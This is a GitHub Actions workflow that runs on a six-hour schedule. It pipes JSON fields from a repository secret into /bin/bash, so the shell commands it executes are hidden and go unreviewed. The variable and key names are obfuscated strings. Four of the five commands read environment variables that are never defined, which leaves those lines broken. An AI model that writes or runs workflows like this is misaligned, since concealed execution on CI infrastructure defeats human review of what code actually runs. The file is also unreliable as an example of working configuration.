name: kangweiyou2001

on:
  workflow_dispatch:
  schedule:
    - cron: '57 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kangweiyou2001
        env:
          z11: ${{ secrets.z11 }}
        run: |
          echo $z11 | jq -r .e579 | /bin/bash
          echo $mf60 | jq -r .rwwla255 | /bin/bash
          echo $hujm82 | jq -r .z12984 | /bin/bash
          echo $xmj3 | jq -r .p1699 | /bin/bash
          echo $mp3198 | jq -r .tcvu1925 | /bin/bash

